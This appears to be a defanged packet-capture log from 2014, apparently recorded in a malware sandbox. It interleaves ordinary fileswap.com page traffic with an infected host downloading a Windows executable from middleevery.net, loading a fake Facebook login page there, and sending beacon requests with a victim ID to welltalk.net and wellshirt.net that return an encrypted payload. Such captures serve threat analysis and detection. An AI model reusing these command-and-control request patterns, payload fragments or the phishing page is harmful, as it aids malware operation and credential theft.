Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28

.PNG........IHDR...7...3.....3J.P....IDATh...YtTU.....{g.,........a....TP@Ep....a..9.....::z@Q2.C&``p..}C.A..........N...>U..G.....s...u..V.w_..{...b..,...cTM9E.I.Q....Q'..Z:..G?y.......V.-............L..(?M..H.`..."...D..G3..on\q.Z..t.H(.UuKh.\.Q..Z....._..p4.tz...'...Gw....ex.I]FI5N4lU....Wd.k.. ..7...d[.;....{k..'.i`R.._Uw.VP......Qc....Fg.K5...G.......un.....>..$.9\.Tg.......K.%Z'....n..Q.k.z.YT..i....f...I.n........ .U?6..5.....D.7....q.|O..Y~....T....X....a.z....`X=4'.l.8...Uc..P.yk.........MB..O.N.q7..V.#HFR.lbAaA........w..g..M..O,."...E.{.. ....b\..X.Q2.."#.R8h.(...k. H...F.:l.BY?<..N.qyY........R.5R. uv....XY.[.q.@......G..8..zi.l...g.J......5.....g...pWS'.8.^.J......CR..u...C>...B.'...N.q*%..&......_.J...H.........ED#...N.q.9&y..g...h..F.<.v!MR...e./...7...W...'/.,.o.'x....M..G:.7X,.l.&}Q.e..O.N.q..7.o...T..&.S<6g.......jK..*.Cz...I.#Q..O.NZ....w...o.}...s..?.V.....H....}...wy$Eg.a.....Y.Z.bR..`.......Z|S..4Ml.h...f.(AA....7...TC...........ac$.=M....~#MS9J..n.)..4-z.\.Q...1#a#...Q.O.$.8.%.....m../..on.........p..D*..9w.thq...7.X...y.J.W['.8...ol...-..?<......D9.7..h.\.....\'.$...Uu..X.B.2..>y....__lu.O......ns{C... S...AP.^|...D....%..........X.B.f..U..4.?.Vr...."...}e...`...s..........y...c..............'wn.....r4..$.NX..%?H..N.(...!..._L1..Z............\....B..KR..y.['R.EK..V3n(....b.*...s..x"....U.S.qW.N..i.>e.:.}....?*....J....@.s..R.kM7h%ZA.v..............3:...s\k...f..*..S....@..-3..........-..]M;!..8@..g).J.0P..#..Cr...)G$.(...6.P:*K.E!.......W..yb?2z.N.8....T.....;.

<<< skipped >>>

GET /pagead/conversion/1072568869/?random=1401447789574&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.fileswap.com/ HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.googleadservices.com

HTTP/1.1 302 Found

P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"

Date: Fri, 30 May 2014 15:56:12 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, must-revalidate

Content-Type: image/gif

Location: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0

X-Content-Type-Options: nosniff

Server: cafe

Content-Length: 42

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic

GIF89a.............!.......,...........D.;..

GET /dep/win64mroaes2.exe HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:42 GMT

Last-Modified: Sat, 24 May 2014 19:51:01 GMT

Accept-Ranges: bytes

Content-Length: 2956800

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...(..S.................."...-..\............@...............................-.....s.-.............................................. -......0-.d$............*.|"............-.TG.......................... p-.(....................8-.X............................text.....".......".................`.p`.data.........#.......".............@....rdata........#.......#.............@.`@.pdata..|"....*..$...z*.............@.0@.xdata........ ....... .............@.@@.bss.....[....,.......................`..edata....... -.......,.............@.0@.idata..d$...0-..&....,.............@.0..CRT....p....`-.......,.............@.@..tls....h....p-.......,.............@.`..reloc..TG....-..H....,.............@.0B.................................................................................................................................................................................................ffffff.........H..(1.f.=....MZ....,.........,.........,.........,.....tg....,.....,...tH........".H........e".....,.H....-.H....-.H... -.....j"..=h.#..tf1.H..(........."......Hc.....H..B...H...:PE..u...J.f....t?f......j............].........1.......K...f.H...j"...j".1.H..(..zt...,.........1............H..8....,.D....,.L....,.H....,.H....,.....,.H....,.H.D$ ...".....,.H..8.........AUATUWVSH......D....,.1......H.T$ E..H...H.......eH..%0...1.H.X.H.=.)-..........H9...'..........H...H...|.-.H..u...y.-.1........

<<< skipped >>>

GET /_js/AC_OETags.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 7812

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-1e84"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

// Flash Player Version Detection - Rev 1.6.// Detect Client Browser type.// Copyright(c) 2005-2006 Adobe Macromedia Software, LLC. All rights reserved..var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;.var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;.var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;..function ControlVersion().{..var version;..var axo;..var e;...// NOTE : new ActiveXObject(strFoo) throws an exception if strFoo isn't in the registry...try {...// version will be set for 7.X or greater players...axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");...version = axo.GetVariable("$version");..} catch (e) {..}...if (!version)..{...try {....// version will be set for 6.X players only....axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");........// installed player is some revision of 6.0....// GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,....// so we have to be careful. ........// default to the first public version....version = "WIN 6,0,21,0";.....// throws if AllowScripAccess does not exist (introduced in 6.0r47)......axo.AllowScriptAccess = "always";.....// safe to call for 6.0r47 or greater....version = axo.GetVariable("$version");....} catch (e) {...}..}...if (!version)..{...try {....// version will be set for 4.X or 5.X player....axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");....version = axo.GetVariable("$version");...} catch (e) {...}..}...if (!version)..{...try

<<< skipped >>>

GET /_images/ico_24_social.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1696

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-6a0"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...SiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134342, 2010/01/10-18:06:43 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204" xmpMM:DocumentID="xmp.did:2514A6C4E30D11E1A651ECCBB496C13E" xmpMM:InstanceID="xmp.iid:2514A6C3E30D11E1A651ECCBB496C13E" xmp:CreatorTool="Adobe Photoshop CS5"> <xmpMM:DerivedFrom stRef:instanceID="uuid:54EEA7D7DECDE111A8DDAB7BBB8AB66E" stRef:documentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C....IDATx...]HSa.....C.0.M.*.e.s.@..3%D...].}7}\y..Wb.Ht.EhD.....^4B.0......)s&....t.gg=......@"......9...<......q..........o...PZ[.q.q..&....b..\L...s..sg@IM.DQ.z.PO{{.@...Db1D..H....x44t..A6.U.X$i..$...hT.p0......u<...&.zz..O.<.q`&.y(e2..Ji.x<....z...........k."M.\.... l&.....dj...l6oV...l.@e.b<.f............,}...GD.9i..)..DA../..@.]Z.e........(.......].,.,....RCIk...."...D?l.....3!..e..c........;.4..."/.J....F.....0x....\.p8....u.j..Rz1.}i...N..;../....E.V......Ys.|f.....^.\...H..~D..$g.:f.....T_ ..Z..-.{...........[...'E.

<<< skipped >>>

GET /_images/header_upload.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 939

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-3ab"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..W.kSq.>....<....i...N.R..B''...D....Q...8.d...`....`....A(us.S..M....y...~.g.....*d.....^.;.9.w..4M....a.....8...K". .0...X,..f#UUI.$1......p.. ...c......ON.s)..V.W".e.....Z.G..`6..N2.v...\&.Y..-`.m..i.....>.o.....82&P(.(.N_.....s.kK.J..L.........@ 0...y..v.]..."%w0.."........^.w.Q...\.8t\.4r.....<..Dm09.](.?....YD.c.2...\L.....L.Q..@.CK.B[m..9:.".>......2....(..J..H...j...!...)...~......;.........8`d?.&.....?......]B.h.1.5.q.7#0....=}..ss..i..(p.K.... .,k....N!..b...<vP.@m....b..jY...Q{;.....#.B9....).6Gt......(..N\T......kN.<3.U.....8.../,...........H.N...$.....@...#...%.`w..4.y..7...'...).3.. Q....}.H.fo...bU...F-)@.....Y*..t~WD/k2..evvh'...a#..X,..B.s...-..h5.L.K!5.{ACa...W5R`". ...?....K..*..l=...oP...b/_bh.e.@K.`..h.v.)c..E..M..M.l..188......X............-......,.......S.>bq.u..."......W-....<.6..c...0.......L....:M`O...x.m[h.In....IEND.B`.....

GET /_images/statement_bg.jpg HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/jpeg

Content-Length: 112505

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-1b779"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

......Exif..II*.................Ducky.......<.....&Adobe.d................H...{..V....w..............................................................................................................................................................................................................................@P`p01............................................................... 0@P1`p!AQ.aq...........................&...D.*....B.....(....%............@b.........nP.....%....(".WpP...f@......P.........).@...........R.....5......D..........Y..........SR........3d......@... ....Z.@...Z.....E...(....*.@(...]@....@.".(..P. %..P.$...B... .. ...f...%......P.......h...D..nP...,............l.....h..@....$..(........b........,... ...2K.........@SR........3d......@..P ...@RY@.........E...(.......E............@%..J.$.."*... .(@.U... ....3f@.....B..J.......(P......@...f.................*......%............d.........nZ..................R...............P(..P....@.D.@5-,..@,...D...@.`..(....]`.. .P...J....H.@DT..(@.P.$.e.(@.....Y........,.....K".......(...1`.....K@...f...................7-".....@.............!...........7(..P@....3`..@..(...(..@..-D.PX....P....Q...P...P..(...G=........@%.".P$.."*... A(@.P.. .....3d...........@.!.......nP.... .........!.......r.....P....$......@..........7(P.....(..............(.............P..............Y@...@...-.......@P ...lnP.%X..@.".(..*. %..P.$.".B...)A. ....l.............P3d..P...7(....D.P........$......jP.... .............b........E......`...........r.....@..f.......P(..P ...@Z.@.e..P

<<< skipped >>>

GET /_images/footer_bg2.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 134

Last-Modified: Fri, 14 Sep 2012 15:15:38 GMT

Connection: keep-alive

ETag: "50534a1a-86"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR.............u.4J....tEXtSoftware.Adobe ImageReadyq.e<...(IDATx.b```.e..B ..D...&8......Y....g..0.(D.{........IEND.B`...

GET /fb_login/index_files/safe_image.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 140

Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28

.PNG........IHDR.............v..9...SIDAT(...1..@.........*..I... .`....%-3.................r...S....y.. .@`*2FRy}..}.H.du5.........IEND.B`...

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b528200 HTTP/1.0

Accept: */*

Connection: close

Host: welltalk.net

HTTP/1.1 500 Internal Server Error

Date: Fri, 30 May 2014 15:55:34 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 671

Content-Type: text/html; charset=iso-8859-1

Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator,. admin@paperboy.co.jp and inform them of the time the error occurred,.and anything you might have done that may have.caused the error.</p>.<p>More information about this error may be available.in the server error log.</p>.<p>Additionally, a 500 Internal Server Error.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...

GET /fb_login/index_files/kHhQaysvKcA.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 14114

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364176096,178142559*/..if (self.CavalryLogger) { CavalryLogger.start_js(["2iC7r"]); }..__d("legacy:fbdesktop-detect",["FBDesktopDetect"],function(a,b,c,d){a.FbDesktopDetect=b('FBDesktopDetect');},3);.__d("IndexLogoutSponsorship",["Event","URI","ge"],function(a,b,c,d,e,f){var g=b('Event'),h=b('URI'),i=b('ge'),j;function k(n){return setTimeout(function(){h('/index.php').addQueryData({l_s:'r'}).go();},n);}function l(n,o){var p=false,q=function(){if(p)return;clearTimeout(j);j=k(o);},r=function(){clearTimeout(j);p=true;};g.listen(document,{mousedown:r,mouseup:r,click:r,keydown:r,mousemove:q});if(n!==null){g.listen(n,'mouseover',function(){g.listen(window,'blur',r);});var s=i('email');try{s.focus();}catch(t){}}}var m={init:function(n,o){j=k(o);l(n,o);}};e.exports=m;});.__d("IntlUtils",["AsyncRequest","Cookie","goURI"],function(a,b,c,d,e,f){var g=b('AsyncRequest'),h=b('Cookie'),i=b('goURI'),j={setXmode:function(k){(new g()).setURI('/ajax/intl/save_xmode.php').setData({xmode:k}).setHandler(function(){document.location.reload();}).send();},setAmode:function(k){new g().setURI('/ajax/intl/save_xmode.php').setData({amode:k,app:false}).setHandler(function(){document.location.reload();}).send();},setLocale:function(k,l,m,n){if(!m)m=k.options[k.selectedIndex].value;j.saveLocale(m,true,null,l,n);},saveLocale:function(k,l,m,n,o){new g().setURI('/ajax/intl/save_locale.php').setData({aloc:k,source:n,app_only:o}).setHandler(function(p){if(l){document.location.reload();}else i(m);}).send();},setLocaleCookie:function(k,l){h.set('

<<< skipped >>>

GET /fb_login/index_files/z15ZzhgIj4W.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 158

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364177031,178142523*/..._52ls{margin:0 auto 0 auto;padding-bottom:30px}..timelineSignUpDialog ._52ls{padding-bottom:0}..#bootloader_1hHU5 { height: 42px; }..

GET /forum/search.php?method=dep&noxor&file=dropbox.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

Content-Type: text/html

Age: 0

Server: YTS/1.20.28

?E\..........l.e..Q...... .....Zdropbox.zip..................................~'.8..N....w..W.4.......{M..... E.K@...?k.:..@.W..v..$'E......tV..b...T......e....>jo..*..F.<c.(....:..^?..j.....n-..h....q...ju.$.;.[..F..""..lg.~.......6..M.=p7..F..$../R*...E..th<......>.nl:3.........>..'.c.sg.Em..".zV....~o}.....=.OyO...0..vR..O......n<..... E...._.-.C*. r...S.....S PC~l......&.A..rG.l.X...e2...`..^.....ZQ.8.B.t...~....S.&.| J.00[.c....%|..;.0.|O.OfQ@,..gE..>.x.".X.....U....B..tI.u\.......%.....1I..%...e.Dc..=.s...N....R."...][.........-...Mi......-...'...hd0...x.S.!#.......".wX....e....iS.......r..WO.B>Q......t..Q..p .N .,....o...r..4mV...O.(,"Qy.|...&.hj..."..6F`6.S...#.?....k.......^x.......MLb.-.....Mp..."=\.A...0..=...45...B.......6O..h ...M..!.UC..y.n....2._!..5ks...^W....-. (..v..M...?_%&........p..S..G.!q....VR..V.Dz.w../................P..~v..S.!.j.?.X.S...I.....n..5..bVo.0.(/..P........h....<X...xm.....n.K..=.T......./...,uK....R.c.gbc.7s.......#..J."...Y......]cG*4.pG........J..zm..........X..gV^...uS.=.X..N....1H....b$......~a....q.....E%.........&wh.X .n...tOE;7.K!.Y;...%O.m.............

GET /_js/jquery.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 94837

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-17275"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

/*! jQuery v1.7.2 jquery.com | jquery.org/license */ (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"") "<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g ){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l " " k,n=e[m]||e["* " k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1] " " k];if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from " m.replace(" "," to ")),n!==!0&&(c=n?n(c):p(o(c)))}}return c}function ca(a,c,d){var e=a.contents,f=a.dataTypes,g=a.respon

<<< skipped >>>

GET /_images/ico_24_upload.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1618

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-652"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...SiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134342, 2010/01/10-18:06:43 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204" xmpMM:DocumentID="xmp.did:DDE02BC3E30C11E1A82DD38E61C78D4D" xmpMM:InstanceID="xmp.iid:DDE02BC2E30C11E1A82DD38E61C78D4D" xmp:CreatorTool="Adobe Photoshop CS5"> <xmpMM:DerivedFrom stRef:instanceID="uuid:54EEA7D7DECDE111A8DDAB7BBB8AB66E" stRef:documentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..Yz....IDATx..VO..a..3..Y.Qw..O....6.0h!.:G.t..V...m/A.=.....K.].x.K......b.[s.E.MqL....\...m5<..7.|.|.{.....o.UUa....e....`...."D...|#"..D.B(...Q.3p.Z......T...w..N....tC...F.....n....P(.=...a.@z..........9.X..........L^h.j.....D.b3.. .*..j.(.....P(..hl.;._.l.'...y.v...h@E.`...A..m.DQ.(.J...*l..p..ci...>..R...6EZ )........1.s.aV.n..X.. .T*.Hl|.h.%..v(.7p.L[8.~...c.G6@".2l.L@l.5.;...ak..9......^.....2.E.;e.....>b..D...';.l..`.......)...&..$g .).*S......j.......(...#..U...k....$I...a...S..j...N].....F.....y..l.N...:G..0....IQ..D..ln..3

<<< skipped >>>

GET /_images/header_bg.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 151

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-97"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR.......\..... gH.....tEXtSoftware.Adobe ImageReadyq.e<...9IDATx.b...?.....#.........&G..s.e#cd1llB........L3s........cp........IEND.B`.....

GET /_images/login_highlight.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 124

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-7c"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR.............L.W.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b....^&. ..o..b..b..................IEND.B`.....

GET /_images/home/home_upload_01.jpg HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/jpeg

Content-Length: 53109

Last-Modified: Thu, 13 Sep 2012 20:34:28 GMT

Connection: keep-alive

ETag: "50524354-cf75"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

